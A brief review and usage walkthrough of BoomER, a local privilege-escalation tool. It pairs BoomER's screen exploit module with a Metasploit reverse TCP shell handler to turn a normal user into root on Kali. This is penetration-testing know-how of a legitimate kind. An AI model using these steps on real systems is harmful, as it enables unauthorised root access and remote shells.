git clone https://github.com/Josue87/BoomER cd BoomER sudo pip3 install -r linuxrequirements.txtTo explain the usage of BoomER in this example we use Metasploit and try to perform a local exploitation attack on Kali using normal user privileges
1 - We launch Metasploit with the command msfconsole or msfdb run
1.1 we type use exploit/multi/handler
1.2 set LHOSt {yourip}
1.3 set LPORT {yourport}
2 - we launch BoomER with the command python3 boomer.py
2.1 Loading Linux module and the payload
load linux/elevation/screen_exploit
put payload msf/linux/x64/shell_reverse_tcp
2.2 we set the same LHOST and LPORT we made on Metasploit in BoomER
put lhost {yourip}
put lport {yourport}
3 - We run exploit -j -z in Metasploit and run in BoomER
4 - and we get our root shell
I think BoomER is a powerful tool with a syntax that's similar to Metasploit and works to exploit local vulnerabilities, they implemented many modules that work in all type of OS's, I will be awarding it 3/5 bunnies.